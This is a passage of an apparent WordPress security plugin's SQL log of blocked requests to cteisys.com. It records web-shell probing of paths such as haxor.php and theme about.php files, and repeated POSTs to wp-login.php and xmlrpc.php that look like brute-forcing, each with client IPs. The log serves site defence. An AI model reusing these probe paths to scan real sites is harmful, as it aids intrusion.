Chrome\\/84.0.4147.125 Safari\\/537.36\"}','1ZHsLCh8Xw7y35vt0QqNUifm',0,1665191310.0806,302,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','61lUxQ8REbiWNmOfDBMdYXLs',0,1665191308.9953,292,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/2index.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Sve17pHjsGZ9kA5lUrn38NzV',0,1665191307.9574,294,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/votes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','gztRFAoUNY7lys4D5wfVESh6',0,1665191306.8339,356,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/votes.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','xrZR576MWNVeBYHz2afFlLIK',0,1665191305.7048,316,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/css/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','7HPmdBefWRhlVavuwJ3ZrIpK',0,1665191304.5384,309,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/css/load.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','L1rXgGWAVOPYhfTKyEud75Qc',0,1665191303.3115,362,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/contents.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','YszkfnvE908KIWyGimqPXShN',0,1665191302.1823,343,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/contents.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','G2rIUZ8V1p4PHFzME3BuhLvN',0,1665191301.1086,290,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/css/contents.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','z3Z79rBEp0bTuvPGKAeCwqxY',0,1665191299.9856,342,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/css/contents.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','dp6EKnbL4aJNmj1ukoU85VrQ',0,1665191298.8439,327,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/css/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','pbuB9yewxCAv6sHQROoI2Ydr',0,1665191296.1916,303,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/css/index.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','gpYD8dnVMxmGjSLJoPIlzhH6',0,1665191295.0717,280,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/years.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Z01yOWsxJTh3YQzKPHvbESVu',0,1665191293.9843,292,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/years.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Hko96cIrYnxigDzAEUwq4CTt',0,1665191292.8995,292,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/wp-content/themes/seotheme/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','IymRHcNfJ9pX1K7xUA3GkaLg',0,1665191291.7831,332,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/wp-content/themes/seotheme/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','X7Zk8j9WYrJTLznicHpes0Il',0,1665191290.5576,399,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/wp-content/themes/pridmag/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','OkdQSYF3jxr2KBNyGWZmRU8V',0,1665191286.4899,328,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/wp-content/themes/pridmag/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','u8QGrfaWBK4L6vUohD5bkpZA',0,1665191285.2455,317,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','oigJbUGChztnu84QeZjI6M0B',0,1665249204.2291,310,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/license.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','81C0DaQjRyx4H2IA5zPrMvti',0,1665249199.3259,299,'','GET',403,0,700,0,1,'',0),('69.163.196.200',1168360648,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','h53aRPXnpEzVmty7okKBgMAl',0,1665200438.6258,17798,'','POST',403,0,600,0,1,'',0),('185.156.174.27',3114053147,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','bBJy1vFilA8SC9GsoPXDE5qp',0,1665199944.8564,21490,'','POST',403,0,515,0,1,'',0),('161.35.52.207',2703439055,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','oTnkc5NLgIlUyez9YuJACEaZ',0,1665198748.3160,17333,'','POST',403,0,600,0,1,'',0),('51.178.138.5',867338757,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','ZckiCGustvByJS6hUN2F5fdg',0,1665208886.6561,8428,'','POST',403,0,600,0,1,'',0),('124.70.98.118',2084987510,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZE8HCDUl2t5SGve7gmJKqjsT',0,1665208877.1153,17964,'','POST',403,0,515,0,1,'',0),('184.168.125.241',3098050033,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','O4dAQ5qWlnIs6KxR3pmT8t1Y',0,1665208611.5403,19023,'','POST',403,0,515,0,1,'',0),('162.241.248.14',2733766670,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','glHPtAiuWFS2e75qLwXkb081',0,1665208402.3851,20053,'','POST',403,0,515,0,1,'',0),('103.28.36.205',1729897677,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1q9odNFQmtgGHu2XljLanPwO',0,1665208130.5143,18659,'','POST',403,0,515,0,1,'',0),('62.102.148.166',1046910118,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','9LXslFId4Tz2HCADrVS57Bmp',0,1665204366.5351,2199,'','POST',403,0,515,0,1,'',0),('133.130.103.36',2239915812,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','t7fS6gApGFe2waOoijRLB958',0,1665203818.0293,17342,'','POST',403,0,600,0,1,'',0),('209.97.162.248',3512836856,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','ZKHELusfhPSM3CqV7rjXD60R',0,1665202125.3681,7651,'','POST',403,0,600,0,1,'',0),('87.101.92.171',1466260651,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','BYxCLE6UtfynFqGWKkis7Q92',0,1665201954.9336,19114,'','POST',403,0,515,0,1,'',0),('72.9.158.112',1208589936,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cq5STOM9HWeZYrtXpUojJmVv',0,1665207640.7875,18986,'','POST',403,0,515,0,1,'',0),('134.19.179.203',2249438155,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','43uIEPjGrki1KM8Ayo5xgVY6',0,1665207487.1686,18463,'','POST',403,0,515,0,1,'',0),('162.241.115.107',2733732715,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','L4ifED5NCS0lVkJUK2IsuByG',0,1665207397.2415,19094,'','POST',403,0,515,0,1,'',0),('167.71.141.164',2806484388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','WahJnRCb0QgY1EtAqKsI7vPu',0,1665207195.3940,682,'','POST',403,0,600,0,1,'',0),('74.220.219.213',1255988181,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pQlWGZUgdH3n7cPyrmies21R',0,1665207172.1503,18363,'','POST',403,0,515,0,1,'',0),('190.92.137.177',3193735601,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6uVbKD3pTYUScgfmyNztCPsn',0,1665206879.5486,18869,'','POST',403,0,515,0,1,'',0),('213.152.161.219',3583549915,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','lPsHWGOzmgctQ7LThBbK46F0',0,1665206724.3603,18443,'','POST',403,0,515,0,1,'',0),('62.90.101.113',1046111601,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','henBcU64pFK8zM2WvJZgob0N',0,1665206628.2277,1304,'','POST',403,0,515,0,1,'',0),('146.70.76.35',2454080547,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','t7LkjMX2RwYCE3GVznSA0ZqB',0,1665206586.2977,18236,'','POST',403,0,515,0,1,'',0),('160.153.249.218',2694445530,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GO9p5CShNVxibuHkDda37RTP',0,1665206382.6623,18869,'','POST',403,0,515,0,1,'',0),('162.241.115.107',2733732715,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jzHM1NlBbSy7XYsAKFdixqVR',0,1665206132.6323,18518,'','POST',403,0,515,0,1,'',0),('162.241.217.237',2733758957,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','z0I28R5j36FeMixusqNWSl7P',0,1665205852.9073,20230,'','POST',403,0,515,0,1,'',0),('199.188.207.230',3351039974,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VFkf0lw86LhZNjJE9proeWsS',0,1665205542.2045,18554,'','POST',403,0,515,0,1,'',0),('43.225.53.24',736179480,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5IG3Vq2d4JBHhb6p89tCEmso',0,1665205264.3234,19000,'','POST',403,0,515,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ki7G0ovQyaf6Aw31rx8UTSe9',0,1665249193.6436,298,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','WVbqHgFTiBC4GXDYxRUINaKZ',0,1665249189.3941,299,'','GET',403,0,700,0,1,'',0),('124.70.98.118',2084987510,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Ehs0SRF3omk4g9PvK8qpHQCW',0,1665212332.0197,1529,'','POST',403,0,515,0,1,'',0),('207.154.248.39',3483039783,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','Qr0p9iecSWBGLA4y8dJlsHPC',0,1665212246.2226,7524,'','POST',403,0,600,0,1,'',0),('173.212.197.26',2916402458,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tmOao2WSd3C4RVnQjIrwi9Uy',0,1665212082.1177,18826,'','POST',403,0,515,0,1,'',0),('159.65.219.142',2671893390,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QGcATDwovrLI9NVyKEX5hU8Y',0,1665211590.8483,18463,'','POST',403,0,515,0,1,'',0),('36.92.1.31',610009375,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AT2R6SK3QwEr9Wpn74JgoxX8',0,1665211087.9723,18466,'','POST',403,0,515,0,1,'',0),('54.38.44.6',908471302,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ON3xBz9uy2FTEakdSX87f4Dv',0,1665210890.6583,19165,'','POST',403,0,515,0,1,'',0),('190.92.159.48',3193741104,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AiH8DIQURmapXWMl2rsN046E',0,1665210636.7564,18831,'','POST',403,0,515,0,1,'',0),('145.239.30.120',2448367224,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','wAYlLV3Hn7OGhCzxkicEbfWX',0,1665210577.3574,17177,'','POST',403,0,600,0,1,'',0),('42.200.109.156',717778332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VN3B7KYOpD2wtbFELU4Zcqf5',0,1665210352.0103,18746,'','POST',403,0,515,0,1,'',0),('5.101.156.219',90545371,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7q0O4yNYLr8ImuCzWoE6AKfM',0,1665210163.9228,20034,'','POST',403,0,515,0,1,'',0),('199.188.207.230',3351039974,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ryBpMOuEoFU71ieTKIhQYJ85',0,1665209856.3403,8403,'','POST',403,0,515,0,1,'',0),('139.99.71.253',2338539517,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','8pL3YNDzcv4yUVE1e5QbgFio',0,1665209810.9538,654,'','POST',403,0,515,0,1,'',0),('51.79.144.41',860852265,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Q6PowGpVau9ZkLjXIrH2fRiO',0,1665209608.7803,18697,'','POST',403,0,515,0,1,'',0),('128.199.178.73',2160570953,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dJsvVAl0S9OH7p4ba5kxKjXe',0,1665209097.1607,20194,'','POST',403,0,515,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/jindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','JF3adRLe5WMc1tV0sODCprfI',0,1665249187.3135,278,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/images/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Dd2kuSWaKh15jl8wJCN3nIzy',0,1665249182.8930,297,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kwvWR5VKHgJA1sSx0EuZXznU',0,1665249179.8225,272,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Q4lnfd2DzRpwOUSAGI0cj7vx',0,1665249176.6437,280,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','HQ5qVF6hInCBTJYOukj1Nw3E',0,1665249172.9208,273,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/h.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1Ak8IweRM9B4a0GUKxWDpu2h',0,1665249171.8315,314,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/goods.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','IW7RlZ8YLnMz9xHfGraDOehK',0,1665249166.7984,296,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4h9WqOv7NsAiCMUkgyf8RBP2',0,1665249158.5659,306,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/fox.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','i0QSWCjUpTwfO6Xxnb18tFVN',0,1665249154.4509,311,'','GET',403,0,700,0,1,'',0),('185.76.77.160',3108785568,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nReqgJ5CTwXPzdEVk7DjpAZh',0,1665215910.8602,1721,'','POST',403,0,515,0,1,'',0),('82.165.184.76',1386592332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','b5EZ1gT2Uscp8HrDY7VAQhSl',0,1665215632.1389,1414,'','POST',403,0,515,0,1,'',0),('82.166.39.15',1386620687,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','2vZqjtXod8a54AbKkeNirSun',0,1665215497.9981,1279,'','POST',403,0,600,0,1,'',0),('85.119.122.23',1433893399,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LQV2pweCGyAdcmKsaE8qlFt0',0,1665215351.2523,18800,'','POST',403,0,515,0,1,'',0),('185.183.122.143',3115809423,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TJRzXM7vcLHSexs2KnDw5fIN',0,1665215076.9793,18759,'','POST',403,0,515,0,1,'',0),('190.171.170.94',3198921310,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ugqpvQisT3cYIFK6HCXMy5h7',0,1665214784.0453,18784,'','POST',403,0,515,0,1,'',0),('107.180.247.212',1807022036,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cCRlq5boOyztrZ4S8QPhHMjf',0,1665214016.2654,19397,'','POST',403,0,515,0,1,'',0),('137.184.140.67',2310573123,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WsgJ3QbSoevV48dF9IOpxzun',0,1665213760.0896,1681,'','POST',403,0,515,0,1,'',0),('81.68.222.69',1363467845,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','m8RwNHaT3tkQ5jlJDM0I6FsB',0,1665213498.4403,18606,'','POST',403,0,515,0,1,'',0),('158.69.26.40',2655328808,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PiC4ceVjlEfD5mLR1nNrbw3H',0,1665213268.1527,11199,'','POST',403,0,515,0,1,'',0),('35.198.25.12',600185100,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pzA4Ov2aYVZKJSmtlfGDXk1r',0,1665213026.6876,18347,'','POST',403,0,515,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','WIPuwfRdE61nFTecgKMqkAxC',0,1665249151.2993,299,'','GET',403,0,700,0,1,'',0),('5.101.157.241',90545649,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MarF49vGnwus8LjCPJmKygVX',0,1665212580.4786,19883,'','POST',403,0,515,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/edit-form.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fuk6Tr4jgWsdLPFB8bM9mzlJ',0,1665249148.3372,314,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','B5r8GgdiDVOYsEuWSpZzMy23',0,1665249141.3830,284,'','GET',403,0,700,0,1,'',0),('34.254.111.139',587100043,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 